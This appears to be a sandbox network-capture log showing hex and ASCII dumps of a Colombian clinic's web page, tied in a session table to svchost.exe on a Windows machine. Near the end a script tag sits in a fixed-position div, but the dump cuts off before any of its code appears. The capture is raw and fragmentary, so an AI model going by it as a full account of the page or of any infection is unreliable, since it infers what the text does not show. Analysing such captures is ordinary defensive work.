                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2044INData Raw: 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d
                                                                                                                                                                                                                                                                        Data Ascii: i></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" data-g-menuparent=""> <span class="g-separator g-menu-item-content"> <span class="g-menu-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2045INData Raw: 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 76 61 6c 6f 72 65 73 2d 63 6f 72 70 6f 72 61 74 69 76 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65
                                                                                                                                                                                                                                                                        Data Ascii: "g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/valores-corporativos"><span class="g-menu-ite
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2047INData Raw: 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 20 67 2d 69 6e 61 63 74 69 76 65 20 67 2d 66 61 64 65 20 67 2d 64 72 6f 70 64 6f 77 6e 2d 72 69 67 68 74 22 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e 2d 63 6f 6c 75 6d 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64
                                                                                                                                                                                                                                                                        Data Ascii: nu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown g-inactive g-fade g-dropdown-right"><li class="g-dropdown-column"><div class="g-grid
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2048INData Raw: 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 64 75 63 61 63 69 c3 b3 6e 20 79 20 70 72 6f 6d 6f 63 69 c3 b3 6e 20 70 61 72 61 20 6c 61 20 64 6f 6e 61 63 69 c3 b3 6e 20 64 65 20 c3 b3 72 67 61 6e 6f 73 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c
                                                                                                                                                                                                                                                                        Data Ascii: iner" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-item-title">Educacin y promocin para la donacin de rganos </span></span></a></l
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2049INData Raw: 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20
                                                                                                                                                                                                                                                                        Data Ascii: g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></span></a></li><li class="g-menu-item
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2051INData Raw: 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d
                                                                                                                                                                                                                                                                        Data Ascii: lass="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span></span></a></li><li class="g-m
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2052INData Raw: 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65
                                                                                                                                                                                                                                                                        Data Ascii: ass="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-compone
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2053INData Raw: 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 3b 2f 2a 70 6f 70 75 70 20 62 61 63 6b 67
                                                                                                                                                                                                                                                                        Data Ascii: <style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255, 255, 255, 1);/*popup backg
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2055INData Raw: 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 22 20 69 64 3d 22 67 61 66 61 6e
                                                                                                                                                                                                                                                                        Data Ascii: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gafancybox-overlay" id="gafan
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2056INData Raw: 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 3e
                                                                                                                                                                                                                                                                        Data Ascii: Id(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" target="_blank" rel="noopener">
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2057INData Raw: 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 62 75
                                                                                                                                                                                                                                                                        Data Ascii: k "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-bu
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2059INData Raw: 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f
                                                                                                                                                                                                                                                                        Data Ascii: ome/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblo
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2060INData Raw: 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c
                                                                                                                                                                                                                                                                        Data Ascii: cialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure cl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2061INData Raw: 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70
                                                                                                                                                                                                                                                                        Data Ascii: ome"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="p
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2063INData Raw: 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 35 30 22 3e 0a 3c 66 6f 6f 74 65 72 20 69 64 3d 22 67 2d 66 6f 6f 74 65 72 22 3e 0a 3c 64 69 76
                                                                                                                                                                                                                                                                        Data Ascii: ="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrapper"><div class="g-container"> <div class="g-grid"><div class="g-block size-50"><footer id="g-footer"><div
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2064INData Raw: 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e 67 3e 48 6f 72 61 72 69 6f 20 64 65 20 41 74 65 6e 63 69 c3 b3 6e 3a 20 44 65 20 4c 75 6e 65 73 20 61 20 56 69 65 72 6e 65 73 20 64 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 31 32 3a 30 30 20 6d 20 79 20 64 65 20 32 3a 30 30 20 70 2e 6d 2e 20 61 20 36 3a 30 30 20 70 2e 6d 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a
                                                                                                                                                                                                                                                                        Data Ascii: atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <strong>Horario de Atencin: De Lunes a Viernes de 7:00 a.m. a 12:00 m y de 2:00 p.m. a 6:00 p.m.</br><br></br>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2066INData Raw: 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 50 42 58 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 50 42 58 3a 20 2b 35 37 20 36 30
                                                                                                                                                                                                                                                                        Data Ascii: iv> </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div><div class="g-contact-item"><div class="g-contact-label">PBX</div> <div class="g-contact-text">PBX: +57 60
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2067INData Raw: 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 6f 74 6f 70 2d 36 38 34 36 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: cle" class="g-content g-particle"> <a href="/" title="" rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Luis" /></a></div></div><div class="g-block size-33-3"><div id="totop-6846-particle" class="g-content
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2068INData Raw: 34 34 34 0d 0a 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 72 69 67 68 74 3a 30 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 39 39 39 39 39 39 39 39 39 39 39 39 3b 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 4a
                                                                                                                                                                                                                                                                        Data Ascii: 444ype="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="position: fixed; bottom: 0px; right:0px; z-index:999999999999; display:block;"><script language="JavaScript" type="text/J
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2069INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        134192.168.2.662035104.21.48.207443C:\Windows\SysWOW64\svchost.exe
